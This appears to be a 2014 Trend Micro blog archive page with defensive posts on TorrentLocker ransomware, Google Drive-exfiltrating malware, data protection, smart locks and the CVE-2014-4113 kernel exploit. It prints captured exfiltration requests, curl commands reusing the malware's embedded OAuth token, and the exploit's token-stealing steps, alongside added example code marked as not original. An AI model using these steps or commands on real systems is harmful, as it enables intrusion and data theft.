TrendLabs Malware Blog - Trend Micro
October 2014

    We recently observed a new ransomware variant, TorrentLocker, that was targeted at nearly 4,000 organizations and enterprises, many of which are located in Italy. TorrentLocker is similar to an earlier ransomware family (CryptoLocker), and also encrypts various files and forces users to pay a sum of money. TorrentLocker uses the TOR anonymity network to hide its network traffic, which may have been the origin of its name.

    The said threat used spam email written in Italian with several templates as part of its social engineering tactics. Translated into English, these messages read:

    1. Your question has been asked on the forum {day}/{month}/{year} {time}. Detailed answer refer to the following address: {malicious link}
    2. He sent a bill that would have paid before {day}/{month}/{year}. Details found: {malicious link}
    3. Your request has been initiated to revise the payment {malicious link}

    Figure 1. Sample spam email

    All the messages contain a link that points to a .ZIP file. Decompressing the archive yields a file disguised as a .PDF document. PDF files are commonly passed around within organizations, so employees who receive this spammed message may be tricked into thinking that it is legitimate.

    Figure 2. Screenshot of the linked archive file

    Some of the archive files have Italian filenames that translate to payment, transaction, compensation, and balance. However, instead of a PDF file, these files are actually a CryptoLocker variant detected by Trend Micro as TROJ_CRILOCK.YNG.

    Similar to other CryptoLocker variants, it encrypts a wide variety of file types, including .DOTX, .DOCX, .DOC, .TXT, .PPT, .PPTX, and .XLSX, among others. All of these file types are associated with Microsoft Office products and are commonly used in enterprises in daily operations.

    To receive the decryptor tool that supposedly recovers their files, users need to pay the ransom in Bitcoin, a type of digital currency. One of the samples we found asked for a ransom of 1.375 BTC, which is worth around $500.



    Figures 3 and 4. Screenshots of the ransomware

    Italian users are the most affected by this particular spam run: just over half of all spam messages identified with it were sent to users in Italy. A quarter came from Brazil, with other countries accounting for the remainder. At its peak, several thousand users were affected per day.

    Figure 5. Distribution of TorrentLocker targets globally

    Figure 6. Number of affected targets per day

    We protect our users against this threat by blocking the different facets of this threat. In addition to blocking the various spam messages, we also block the malicious URLs and detect the malicious files used in this attack.

    The hashes of the files seen in this attack include:


    Additional information provided by Grant Chen


    Using cloud-based sharing sites is not a new routine for bad guys. Aside from providing free storage for their malicious files, these legitimate sites are used to evade security vendors and researchers.

    We have seen malware that has taken advantage of these sites, such as Dropbox, Sendspace, and Evernote. We can now add Google Drive to the list of “abused” sites. We recently came across malware, detected as TSPY_DRIGO.A, that uses Google Drive as one way of siphoning information from its victims.

    Access to Google Drive

    Once executed, the malware checks certain locations for the following file types and uploads them to Google Drive:

    • XLSX
    • XLS
    • DOC
    • DOCX
    • PDF
    • TXT
    • PPT
    • PPTX

    The locations where the malware checks for files include the Recycle Bin and the User Documents folder.

    In order to upload the files to Google Drive, the client_id and client_secret were embedded in the malware, together with a refresh token. Refresh tokens are part of the OAuth 2.0 protocol, which Google Drive uses; the same protocol is what lets Twitter, Facebook and other sites’ accounts be used to log in to a different website. Access tokens grant access to a Google Drive account, but they expire, so refresh tokens are needed to obtain new access tokens.

    We decrypted communication from the malware and saw activity such as requests for new tokens and uploading files.

    ; request for new token

    POST /o/oauth2/token HTTP/1.1
    User-Agent: Go 1.1 package http
    Content-Length: 208
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip

    client_id={REMOVED}&client_secret={REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

    ; reply for new token

    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Oct 2014 08:08:32 GMT
    Content-Disposition: attachment; filename="sample.txt"; filename*=UTF-8''sample.txt
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alternate-Protocol: 443:quic
    Transfer-Encoding: chunked

    {
      "access_token" : "{REMOVED}",
      "token_type" : "Bearer",
      "expires_in" : 3600
    }

    ; upload file

    POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
    User-Agent: google-api-go-client/0.5
    Content-Length: 398
    Authorization: OAuth {REMOVED}
    Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
    Accept-Encoding: gzip

    We used this same approach in order to check the files uploaded in the Google Drive account. As of this writing, some of the files are still “active” or present in the account. We’ve also found that the file names reveal the targeted entities, which are mostly government agencies.

    Below is the command line used for testing:

    ; Request a new access token (the endpoint host was not shown in the original; this is Google's standard OAuth 2.0 token endpoint)
    curl -d "client_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN}" https://accounts.google.com/o/oauth2/token

    ; List files (the endpoint host was not shown in the original; this is the Drive v2 files endpoint)
    curl -H "Authorization: OAuth {ACCESS_TOKEN}" https://www.googleapis.com/drive/v2/files

    Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

    "kind": "drive#file",
    "title": "{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc",
    "mimeType": "application/",
    "createdDate": "2014-10-16T10:13:14.339Z",
    "modifiedDate": "2014-10-16T10:13:16.286Z",
    "modifiedByMeDate": "2014-10-16T10:13:16.286Z",
    "lastViewedByMeDate": "2014-10-16T10:13:16.286Z",
    "markedViewedByMeDate": "1970-01-01T00:00:00.000Z",
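As an added example (not code from the post or from the malware), the following C program classifies captured HTTP requests of the kind shown above into the two actions that matter for detection, the refresh-token POST and the Drive multipart upload, and notes the generic Go User-Agent strings. The three sample requests are constructed from the capture, with secrets replaced.

```c
/* Added example (not from the post or from the malware): classify one captured
 * HTTP request into the actions the malware performs, a refresh-token POST and
 * a Drive multipart upload, and note the generic Go User-Agent strings seen in
 * the capture. Sample requests are constructed from the traffic shown above. */
#include <stdio.h>
#include <string.h>
/* classification flags: token refresh, Drive upload, Go client User-Agent */
enum { REQ_TOKEN_REFRESH = 1, REQ_DRIVE_UPLOAD = 2, REQ_GO_CLIENT = 4 };

/* Copy the value of header 'name' into out; return 1 if found. The name must
 * start a line and be followed by ':' so a match inside a value is ignored. */
static int header_value(const char *req, const char *name, char *out, size_t outlen)
{
    size_t nlen = strlen(name);
    const char *p = req;
    while ((p = strstr(p, name)) != NULL) {
        if ((p == req || p[-1] == '\n') && p[nlen] == ':') {
            p += nlen + 1;
            while (*p == ' ') p++;
            size_t n = strcspn(p, "\r\n");
            if (n >= outlen) n = outlen - 1;
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
        p += nlen;
    }
    return 0;
}

/* Body starts after the blank line; "" if the request has none. */
static const char *body_of(const char *req)
{
    const char *b = strstr(req, "\r\n\r\n");
    return b ? b + 4 : "";
}

/* Return a bitmask of the flags above for one raw request. */
int classify_request(const char *req)
{
    int flags = 0;
    char ua[128];
    if (strncmp(req, "POST /o/oauth2/token ", 21) == 0 &&
        strstr(body_of(req), "grant_type=refresh_token") != NULL)
        flags |= REQ_TOKEN_REFRESH;
    if (strncmp(req, "POST /upload/drive/v2/files", 27) == 0)
        flags |= REQ_DRIVE_UPLOAD;
    if (header_value(req, "User-Agent", ua, sizeof ua) &&
        (strncmp(ua, "Go ", 3) == 0 || strncmp(ua, "google-api-go-client", 20) == 0))
        flags |= REQ_GO_CLIENT;
    return flags;
}

/* Constructed requests modelled on the capture above (secrets replaced). */
static const char REFRESH_REQ[] =
    "POST /o/oauth2/token HTTP/1.1\r\n"
    "User-Agent: Go 1.1 package http\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "client_id={REMOVED}&client_secret={REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}";
static const char UPLOAD_REQ[] =
    "POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1\r\n"
    "User-Agent: google-api-go-client/0.5\r\n"
    "Authorization: OAuth {REMOVED}\r\n"
    "Content-Type: multipart/related; boundary=e0cee80c4f3d21e1\r\n\r\n";
static const char BROWSER_REQ[] =   /* a browser listing its own Drive: benign */
    "GET /drive/v2/files HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1)\r\n\r\n";

int main(void)
{
    printf("refresh=%d upload=%d browser=%d\n", classify_request(REFRESH_REQ),
           classify_request(UPLOAD_REQ), classify_request(BROWSER_REQ));   /* 5 6 0 */
    return 0;
}
```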

    The Other Google Connection

    Use of Google Drive isn’t the only thing that connects this malware to Google. The malware was actually created using the Go programming language, commonly known as golang. This is an open source programming language that was initially developed by Google. According to Google, “the goals of the Go project were to eliminate the slowness and clumsiness of software development at Google, and thereby to make the process more productive and scalable.”

    While interesting, the use of golang is not new; security researchers have seen golang-created malware as early as 2012. It would be hard to pinpoint the exact reason for using golang but some have attributed its appeal to its supposed lack of mainstream profile.

    Gathering Information

    Our analysis shows that this malware can only upload document-type files to Google Drive. This type of malware routine is well suited for reconnaissance, one of the earlier stages of targeted attacks. After all, one of the key aspects of a successful attack is having enough information on the target: the more information attackers can gather, the more attack vectors they can use against their target.

    The following hashes are related to this attack:

    • 2C32674B334F10000CB63ED4BA4EE543A16D8572
    • 2D98DDF8F5128853DD33523BCBBD472B8D362705

    Trend Micro secures enterprises via its Custom Defense solution that provides advanced threat protection by performing network-wide monitoring to detect zero-day malware, malicious communications, and attacker behaviors invisible to standard solutions.

    We have already notified Google about this incident.

    With additional insight from Ronnie Giagone, Dove Chiu, and Vico Fang.



    Recent data breaches in big enterprises like large banks and retail chains make one thing clear: data privacy and protection is a concern for all organizations, not just large ones. If large enterprises with plenty of available resources can be affected by attacks and lose their data, smaller organizations without these resources are at risk as well.

    Users are not just worried about whether their data is secure; today they are also worried about whether their data will be used properly by the sites and businesses they deal with. Concern among users about privacy has grown over recent months and years.

    The statistics bear this all out. A survey carried out in March 2014 by the market research firm GfK highlighted significant, and growing, concerns from consumers about their personal data. 49% of respondents said they were “very much” concerned about how their data was protected, with 60% of respondents saying this concern had increased in the past 12 months.

    Consumers are also taking action. A 2014 study by Radius Global found that 69% of survey respondents would do less business with a company they knew had been breached; 67% would try to only do business with companies that they feel can handle their data. The consequences for companies are clear.

    So, what should companies do? First of all, they need to recognize that data protection is now an important part of doing business. This means that they must approach it as something that matters, and not just as a pain that has to be tolerated.

    To do this, organizations should first take stock and remember just what they are protecting and consider what’s most important – i.e., what is their core data. These should be protected with the best available resources. Keep in mind that the levels of protection necessary can change, depending on regulations (like the soon-to-be-implemented data protection regulations in the European Union).

    Local regulations on data protection can vary significantly. In the United States, there is no comprehensive law that covers all sectors. Instead, per-industry legislation such as the Health Insurance Portability and Accountability Act (HIPAA) is in place.

    In other countries, more comprehensive regulations that cover all sectors are more common. For example, countries in the European Union will soon be covered by the EU General Data Protection Regulation, which mandates EU-wide rules on data protection. Japan has similar laws in the form of the Act on the Protection of Personal Information, which dates back to 2003.

    However, not all organizations actually understand these regulations: in the EU, only 13% of businesses called their understanding of the upcoming regulations “very good”. This is despite the fact that, for example, EU businesses can be fined up to 5% of their annual turnover if they violate the proposed regulations.

    Similar approaches need to be taken to assuage concerns about privacy. Ensure that what data is being collected is used correctly and in such a way as not to be perceived as “creepy” by end users. The same data protection that is done for core data must be applied here, too: end users will not take kindly to businesses that don’t protect the data of their customers.

    In the end, data protection comes down not just to technical measures but to organizations deciding that it matters. With the new year fast approaching, companies can learn from the many incidents of 2014 and ensure that their own organizations do not fall victim to similar attacks. To know more about data protection law, read our infographic, The Road to Compliance: A Visual Guide to the EU Data Protection Law.

    Trend Micro secures users’ data via its integrated data loss prevention technology, which protects data found in endpoints, servers, networks, and even the cloud. It also protects the transfer of data between locations and comes with central policy management, which does not require installing different technologies across multiple security layers.


    Security is one of the top concerns when consumers consider buying smart devices. With cybercrime making the headlines every day, one has to think: is this smart device vulnerable to cyber attacks? Are these technologies secure enough for us to rely on them in our everyday lives?

    A good example of a technology that we need to assess for its security and reliability is the smart lock. One of the key characteristics of smart locks is the use of digital door keys to open them. Digital door keys are typically stored in the vendor’s cloud servers, along with other properties of the lock. This gives the owner great convenience, since they can “send” keys to other people remotely to allow them temporary access. It also enables comprehensive monitoring and reporting, for example to detect forced entry, report damage to the lock, and send alerts to the user.

    Smart locks, however, raise certain security risks as well. For instance, attackers may choose to target the vendor’s cloud servers, which may exist anywhere in the world, to get access to key information. Or if the smart lock supports web access, the attacker may attack the portal through code injection, cross-site scripting, etc. They may also launch phishing attacks to be able to get the user’s credentials to the vendor’s web portal used to manage the lock.

    Attackers can also target the communication between the owner’s smart lock and mobile device. Bluetooth Low Energy (BLE) is a popular protocol for communication between a smart door lock and a mobile device or mobile key fob. During this communication, the digital key is sent from the mobile phone to the door lock over the air via BLE. The communication is encrypted, but certain implementations can be subject to man-in-the-middle (MITM) attacks, as discussed in the security community. Since this type of attack requires capturing the packet exchange during device setup, the time window for an attack is short, which reduces the attack surface significantly. However, it is up to the vendor to provide a strong BLE security implementation.

    Some brands of smart locks allow users to lock and unlock from anywhere in the world. You can use the vendor’s mobile app or web portal to check the lock status and lock or unlock it with a tap. This can be a desired feature for many consumers because of the ease and convenience it offers. The feature, however, does increase the attack surface. In this case, instead of using BLE, commands to the smart lock are sent over the Internet to the home router and then to the lock via the home Wi-Fi network, so the smart lock is visible on the local area network. Traditional IP-based attacks such as port scanning and remote attacks via open ports or firmware vulnerabilities can then be used against the device.

    The Internet of Everything changes how traditional hardware functions. While it creates security challenges, it also provides great opportunities. In the smart lock case, one can implement comprehensive monitoring and reporting, for example to detect forced entry or a broken lock and send the user an alert along with pictures of the damaged lock and of the attacker. For critical IoE devices (such as a door lock in a home), comprehensive monitoring and reporting is important to ensure software and hardware integrity and to detect malicious software or hardware attacks.

    For more detailed discussion on consumer buyer’s guide for smart home devices, you can read our Security Considerations for Consumers Buying Smart Home Devices.


    Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited.

    This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target SCADA systems.

    The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) are in the Windows kernel (Win32k.sys) and affect most Windows versions. In 2013, only one Windows kernel zero-day was made public, and it affected only some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are shifting their focus back to kernel vulnerabilities.

    CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions.

    Given a program as a command-line parameter, the exploit code can launch that program as a new process with SYSTEM privileges. EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges the attackers need. This was seen in Stuxnet, which used CVE-2010-2743 (also in Win32k.sys) to elevate privileges after infecting the system through other exploits.

    The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

    • 70857e02d60c66e27a173f8f292774f1
    • f9f01ce747679b82723b989d01c4d927

    We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

    Everything you need to know about the Win32k.sys vulnerability

    Win32k.sys is responsible for window management, and any GUI process or thread uses it. Its user-mode counterparts are user32.dll and GDI32.dll. Because of its complex interaction with user-mode applications, Win32k.sys has had many problems.

    Let’s take a closer look at the vulnerability being exploited. The essential problem is that a function’s return value is not validated correctly. Programmers tend to overlook this, but an unchecked return value is a serious security risk.

    In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of a win32k!tagWND structure or the error code -1 or -5. Another function, xxxHandleMenuMessages(), calls it and uses its return value as a parameter of xxxSendMessage(). Below is the pseudo code:



    tagWND *pWnd = xxxMNFindWindowFromPoint(...);   // returns a tagWND address, or the error code -1 or -5
    ...   // pWnd is passed on to xxxSendMessage() without checking that it is a valid address

    Obviously, if the error code -1 or -5 is used as an address in xxxSendMessage(), the result is an error such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel mode in the next section.
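The missing check described above, as an added example that is neither the post's code nor Windows source: a lookup that returns either a pointer or the error codes -1 and -5 through the same pointer-typed return, a caller of the unchecked shape the post attributes to xxxHandleMenuMessages(), and the hardened caller that rejects error codes before dereferencing. All identifiers (window_t, find_window_from_point, handle_menu_message_*) are hypothetical stand-ins.

```c
/* Added example (not from the post or the Windows source). Models the
 * pattern behind CVE-2014-4113: a lookup that returns either a pointer or the
 * error codes -1 / -5 through the same pointer-typed return, and a caller that
 * must reject those codes before using the value as an address. All names are
 * hypothetical stand-ins for xxxMNFindWindowFromPoint() and its callers. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define ERR_NOT_FOUND       ((intptr_t)-1)
#define ERR_MENU_DESTROYED  ((intptr_t)-5)   /* 0xfffffffb on 32-bit */
/* Treat the top page of the address space as error codes, never as pointers
 * (the IS_ERR() idiom used in the Linux kernel). */
#define MAX_ERRNO 4095

typedef struct window {
    int id;
    int (*wndproc)(struct window *w, int msg);   /* pointer the caller invokes */
} window_t;

static int real_wndproc(window_t *w, int msg) { return w->id * 1000 + msg; }
static window_t g_window = { 7, real_wndproc };

/* Stand-in for xxxMNFindWindowFromPoint(): a window pointer on success, an
 * error code smuggled in the pointer otherwise. 'menu_destroyed' models the
 * destroyed-menu case from the hook sequence described below. */
window_t *find_window_from_point(int x, int y, int menu_destroyed)
{
    if (menu_destroyed)
        return (window_t *)ERR_MENU_DESTROYED;
    if (x < 0 || y < 0)
        return (window_t *)ERR_NOT_FOUND;
    return &g_window;
}

int is_err_ptr(const void *p)
{
    return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO;
}

/* Vulnerable shape, as the post describes xxxHandleMenuMessages(): the result
 * is used as an address without validation. With -5 in w, each field read
 * lands at 0xfffffffb plus the field offset, i.e. wraps into the low pages
 * the post describes being mapped. Kept only for contrast with the fix. */
int handle_menu_message_unchecked(int x, int y, int menu_destroyed, int msg)
{
    window_t *w = find_window_from_point(x, y, menu_destroyed);
    return w->wndproc(w, msg);
}

/* Hardened shape: reject error codes before the value is dereferenced and
 * propagate them as a status instead. */
int handle_menu_message_checked(int x, int y, int menu_destroyed, int msg, int *out)
{
    window_t *w = find_window_from_point(x, y, menu_destroyed);
    if (w == NULL || is_err_ptr(w))
        return (int)(intptr_t)w;      /* -1 or -5: an error, never an address */
    *out = w->wndproc(w, msg);
    return 0;
}

int main(void)
{
    int result = 0;
    int rc = handle_menu_message_checked(10, 10, 0, 1, &result);
    printf("live menu:      rc=%d result=%d\n", rc, result);             /* rc=0 result=7001 */
    rc = handle_menu_message_checked(10, 10, 1, 1, &result);
    printf("destroyed menu: rc=%d (rejected before dereference)\n", rc); /* rc=-5 */
    return 0;
}
```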

    Below are the key steps or description on how the exploit occurs:

    • Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure.
    • Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code.
    • Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code.
    • Create a child process of the assigned program with SYSTEM privileges.

    The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:

    1. Create a window and a 2-level popup menu.
    2. Hook that window’s wndproc call.
    3. Track the popup menu on the window and enter the hook callback.
    4. In the hook callback, change the wndproc of the menu to another callback.
    5. In the menu’s callback, destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX).
    6. This leads xxxMNFindWindowFromPoint() to return -5 for the destroyed menu.

    Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below: it gets the EPROCESS of the SYSTEM process (PID 4) and copies its privilege token to the EPROCESS of the current process.


    Figure 1. Code snippet of the sample

    From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than, for example, Internet Explorer use-after-free (UAF) vulnerabilities. Some effective user-mode protections, like DEP, are easily bypassed in kernel-mode exploits. This is because a program, rather than entered data or a script, is used to exploit the bug, and such code is by its nature already executable.

    With more application sandboxing adopted in the OS, kernel vulnerabilities will become more important for privilege elevation. Though this exploitation method is no longer new, it will draw attackers’ attention, especially now that CVE-2014-4113 is public.

    During our sample sourcing, we even saw that the source code of an exploit creation tool had been exposed. We expect more exploit variants to be created by attackers. We believe that threat actors need kernel vulnerabilities to carry out EoP attacks and break application sandboxing. As information about these exploitation methods becomes more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

    Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

    Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel mode. As such, the access to the null page and shell code will not lead to code execution, although it will lead to crashes.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice